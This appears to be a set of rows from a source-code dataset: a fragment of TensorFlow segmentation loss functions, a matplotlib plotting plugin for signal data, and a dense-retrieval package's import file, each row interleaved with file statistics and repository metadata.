denominator = tf.math.reduce_sum(y_true + y_pred, axis=(1,2,3))
return 1 - numerator / denominator
def dice_coefficient(y_true, y_pred):
return 1 - dice_loss(y_true, y_pred)
def jaccard_loss(y_true, y_pred):
return 1 - (dice_coefficient(y_true, y_pred)/(2 - dice_coefficient(y_true, y_pred)))
def jaccard_coefficient(y_true, y_pred):
return 1 - jaccard_loss(y_true, y_pred)
return jaccard_loss, jaccard_coefficient
# Tversky Loss.
def tversky(beta=0.5):
def tversky_loss(y_true, y_pred):
numerator = tf.math.reduce_sum(y_true * y_pred, axis=-1)
denominator = tf.math.reduce_sum(y_true * y_pred + beta * (1 - y_true) * y_pred + (1 - beta) * y_true * (1 - y_pred), axis=-1)
return 1 - (numerator + 1) / (denominator + 1)
return tversky_loss
# Cross Entropy + Dice Loss
def entropy_dice(y_true, y_pred):
def dice_loss(y_true, y_pred):
numerator = 2 * tf.math.reduce_sum(y_true * y_pred, axis=(1,2,3))
denominator = tf.math.reduce_sum(y_true + y_pred, axis=(1,2,3))
return tf.reshape(1 - numerator / denominator, (-1,1,1))
return tf.keras.losses.binary_crossentropy(y_true, y_pred) + dice_loss(y_true, y_pred)
# Focal Loss + Dice Loss
def focal_dice(alpha=0.5, gamma=0):
def dice_loss(y_true, y_pred):
numerator = 2 * tf.math.reduce_sum(y_true * y_pred, axis=(1,2,3))
denominator = tf.math.reduce_sum(y_true + y_pred, axis=(1,2,3))
return 1 - numerator / denominator
def focal(alpha=0.5, gamma=0):
def convert_to_logits(y_pred):
y_pred = tf.clip_by_value(y_pred, tf.keras.backend.epsilon(), 1 - tf.keras.backend.epsilon())
return tf.math.log(y_pred / (1 - y_pred))
def focal_loss_with_logits(logits, targets, alpha, gamma, y_pred):
weight_a = alpha * (1 - y_pred) ** gamma * targets
weight_b = (1 - alpha) * y_pred ** gamma * (1 - targets)
return tf.math.log1p(tf.math.exp(-tf.math.abs(logits))) + tf.nn.relu(-logits) * (weight_a + weight_b) + logits * weight_b
def focal_loss(y_true, y_pred):
logits = convert_to_logits(y_pred)
loss = focal_loss_with_logits(logits=logits, targets=y_true, alpha=alpha, gamma=gamma, y_pred=y_pred)
return tf.math.reduce_mean(loss)
return focal_loss
def focal_dice_loss(y_true, y_pred):
focal_loss = focal(alpha, gamma)
return focal_loss(y_true, y_pred) + dice_loss(y_true, y_pred)
return focal_dice_loss
| 30.982857 | 134 | 0.620804 | 812 | 5,422 | 3.862069 | 0.081281 | 0.117985 | 0.066964 | 0.111607 | 0.80102 | 0.797832 | 0.756378 | 0.714605 | 0.703125 | 0.691645 | 0 | 0.02028 | 0.263371 | 5,422 | 175 | 135 | 30.982857 | 0.764897 | 0.033383 | 0 | 0.637363 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.318681 | false | 0 | 0.010989 | 0.043956 | 0.648352 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
452011055a4e6ca1611c40eeae5961a82c786535 | 4,660 | py | Python | saffy/plugins/Graphics.py | PPierzc/Sappy | 5ea6a88f6185e85fe0ce04ca85d082c290d0ebdf | [
"MIT"
] | 1 | 2019-09-14T17:29:13.000Z | 2019-09-14T17:29:13.000Z | saffy/plugins/Graphics.py | PPierzc/Sappy | 5ea6a88f6185e85fe0ce04ca85d082c290d0ebdf | [
"MIT"
] | 2 | 2019-04-02T10:45:58.000Z | 2019-04-02T17:34:47.000Z | saffy/plugins/Graphics.py | PPierzc/Sappy | 5ea6a88f6185e85fe0ce04ca85d082c290d0ebdf | [
"MIT"
] | 3 | 2019-04-07T21:49:36.000Z | 2019-10-20T19:24:10.000Z | import matplotlib.pyplot as plt
import seaborn as sns
from .PluginManager import PluginManager
sns.set()
sns.set_context("talk", font_scale=1.4)
class GraphicsPlugin(PluginManager):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.graphics_style_templates = {
'presentation': {
'plot_background': '#ffedf1',
'figure_background': '#ffffff',
'show_grid': True,
'grid_color': 'r',
'ticks_size': 14,
'label_size': 20,
'plt_style': 'classic',
'line_color': '#ff0641'
},
'paper': {
'plot_background': '#ffffff',
'figure_background': '#ffffff',
'show_grid': True,
'grid_color': 'k',
'ticks_size': 14,
'label_size': 20,
'plt_style': 'classic',
'line_color': '#000000'
}
}
self.graphics_style = self.graphics_style_templates['presentation']
def graphics_set_style(self, style):
if isinstance(style, dict):
self.graphics_style = {**self.graphics_style, **style}
elif style in self.graphics_style_templates.keys():
self.graphics_style = self.graphics_style_templates[style]
else:
raise ValueError('Unknown style')
return self
def graphics_spectrum_plot(
self,
fig=None,
ax=None,
title='',
xlabel='',
ylabel='',
legend=True,
color=None,
*args,
**kwargs
):
color = color if color else self.graphics_style['line_color']
if 'plt_style' in self.graphics_style.keys():
plt.style.use(self.graphics_style['plt_style'])
show = False
if fig is None or ax is None:
show = True
fig, ax = plt.subplots(nrows=self.num_channels, ncols=1)
if self.num_channels == 1:
ax = [ax]
for epoch in self.spectrum:
for idx, channel in enumerate(epoch):
ax[idx].plot(
self.spectrum_freqs,
channel,
color=color,
*args,
**kwargs
)
ax[idx].margins(0.1, 0.1)
ax[idx].set_title(
self.channel_names[idx],
fontsize=20
)
ax[idx].set_facecolor(self.graphics_style['plot_background'])
ax[idx].tick_params(labelsize=self.graphics_style['ticks_size'])
ax[idx].grid(self.graphics_style['show_grid'], color=self.graphics_style['grid_color'])
fig.text(
0.5,
0.05,
xlabel,
ha='center',
fontsize=self.graphics_style['label_size']
)
fig.text(
0.5,
0.95,
title,
ha='center',
fontsize=self.graphics_style['label_size']
)
fig.text(
0.04,
0.5,
ylabel,
va='center',
rotation='vertical',
fontsize=self.graphics_style['label_size']
)
fig.patch.set_facecolor(self.graphics_style['figure_background'])
# We only want the label to show once if multiple epochs
if 'label' in kwargs:
del kwargs['label']
if legend:
for a in ax:
a.legend()
if show:
plt.show()
plt.close()
def graphics_time_plot(
self,
fig=None,
ax=None,
title='',
xlabel='',
ylabel='',
legend=True,
color=None,
*args,
**kwargs):
color = color if color else self.graphics_style['line_color']
if 'plt_style' in self.graphics_style.keys():
plt.style.use(self.graphics_style['plt_style'])
# We will show the graph if no fig or ax is shown. Assuming that this is the desired action.
show = False
if fig is None or ax is None:
show = True
fig, ax = plt.subplots(nrows=self.num_channels, ncols=1)
if self.num_channels == 1:
ax = [ax]
for epoch in self.data:
for idx, channel in enumerate(epoch):
ax[idx].plot(
self.t,
channel,
color=color,
*args,
**kwargs
)
for tag in self.tags:
ax[idx].axvline(
tag / self.fs,
color='#000000',
ls='--'
)
ax[idx].margins(0.1, 0.1)
ax[idx].set_title(
self.channel_names[idx],
fontsize=20
)
ax[idx].set_facecolor(self.graphics_style['plot_background'])
ax[idx].tick_params(labelsize=self.graphics_style['ticks_size'])
ax[idx].grid(self.graphics_style['show_grid'], color=self.graphics_style['grid_color'])
fig.text(
0.5,
0.05,
xlabel,
ha='center',
fontsize=self.graphics_style['label_size']
)
fig.text(
0.5,
0.95,
title,
ha='center',
fontsize=self.graphics_style['label_size']
)
fig.text(
0.04,
0.5,
ylabel,
va='center',
rotation='vertical',
fontsize=self.graphics_style['label_size']
)
fig.patch.set_facecolor(self.graphics_style['figure_background'])
# We only want the label to show once if multiple epochs
if 'label' in kwargs:
del kwargs['label']
if legend:
for a in ax:
a.legend()
if show:
plt.show()
plt.close()
| 21.376147 | 94 | 0.627897 | 635 | 4,660 | 4.445669 | 0.204724 | 0.127524 | 0.180659 | 0.053135 | 0.807651 | 0.76231 | 0.750266 | 0.719802 | 0.689338 | 0.689338 | 0 | 0.02034 | 0.229828 | 4,660 | 217 | 95 | 21.474654 | 0.76623 | 0.042918 | 0 | 0.708791 | 0 | 0 | 0.135323 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.021978 | false | 0 | 0.016484 | 0 | 0.049451 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
18df793b7f49758cefd2fc966a3e469747282b12 | 271 | py | Python | retrieval/dense/__init__.py | park-sungmoo/odqa_baseline_code | 45954be766e5f987bef18e5b8a2e47f1508742cd | [
"Apache-2.0"
] | 67 | 2021-05-12T15:54:28.000Z | 2022-03-12T15:55:35.000Z | retrieval/dense/__init__.py | park-sungmoo/odqa_baseline_code | 45954be766e5f987bef18e5b8a2e47f1508742cd | [
"Apache-2.0"
] | 71 | 2021-05-01T06:07:37.000Z | 2022-01-28T16:54:46.000Z | retrieval/dense/__init__.py | park-sungmoo/odqa_baseline_code | 45954be766e5f987bef18e5b8a2e47f1508742cd | [
"Apache-2.0"
] | 14 | 2021-05-24T10:57:27.000Z | 2022-02-18T06:34:11.000Z | from retrieval.dense.dense_base import DenseRetrieval
from retrieval.dense.dpr_base import DprRetrieval, BaseTrainMixin, Bm25TrainMixin
from retrieval.dense.dpr import DprBert
from retrieval.dense.colbert import ColBert
from retrieval.dense.dpr_electra import DprElectra
| 45.166667 | 81 | 0.874539 | 35 | 271 | 6.685714 | 0.4 | 0.277778 | 0.384615 | 0.269231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.008032 | 0.081181 | 271 | 5 | 82 | 54.2 | 0.931727 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.